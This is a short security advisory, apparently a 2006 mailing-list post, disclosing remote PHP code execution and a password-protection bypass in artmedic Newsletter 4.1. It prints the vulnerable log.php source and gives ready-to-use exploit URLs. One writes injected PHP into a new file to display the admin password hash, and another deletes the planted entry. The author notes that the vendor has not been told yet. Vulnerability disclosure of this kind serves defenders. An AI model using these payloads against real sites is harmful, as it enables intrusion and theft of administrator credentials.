Remote Code Execution in artmedic Newsletter 4.1 [log.php] May 19 2006 01:49PM
c j schmitz gmx de
I found a bug in artmedic Newsletter 4.1 (proably even in newer versions) which lets an attacker run arbitrary php-code and bypass the password protection.

The reason for this is mistake in design.

log.php:

<?php

$time = time();

$date = date("d.m.Y, H:i:s");

$remote = getenv("REMOTE_ADDR");

$ip = getHostByAddr($remote);

$logd = "$time"."&&"."$date"."&&"."$remote"."&&"."$ip"."&&"."$email"."&&\n";

$logdaten = fopen("$logfile", "a+");

flock($logdaten,2);

fputs($logdaten, $logd);

flock($logdaten,3);

fclose($logdaten);

//Log-Daten nach Vorhaltezeit löschen

//Delete old logdata

$ablaufzeit = "$time"-"$logtime";

$pruefung = @file($logfile);

while (list ($line_num, $line) = @each ($pruefung))

{

$zeiten = explode("&&",$line);

if($zeiten[0] <= $ablaufzeit)

{

$fp = fopen( "$logfile", "r" );

$contents = fread($fp, filesize($daten));

fclose($fp);

$line=quotemeta($line);

$string2 = "";

$replace = ereg_replace($line, $string2, $contents);

$fh=fopen($logfile, "w+");

@flock($fp,2);

fputs($fh, $replace);

@flock($fp,3);

fclose($fh);

}}

?>

Usually the log.php is included and $logfile,$logtime and $email are declared in the parent document. If we run "log.php?logfile=anyfile.anyext&logtime=unixtimestamp>0&email=<-- insert php code here -->" we get a file anyfile.anyext with following content:

<html>

...

unixtimestamp&&date&&user.host&&user.ip&&<-- php code -->&&

...

</html>

a simple example to reveal the admin pw Hash is

log.php?logfile=info.php&logtime=000060&email=<?%20require($cur);%20echo
%20$password%20?>

just launch info.php?cur=include.php and you will see it.

to kill the entry type:

"log.php?logfile=info.php&logtime=000000"

vendor has not yet been informed, but he will be as soon as possible ...

regards

C.Schmitz

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus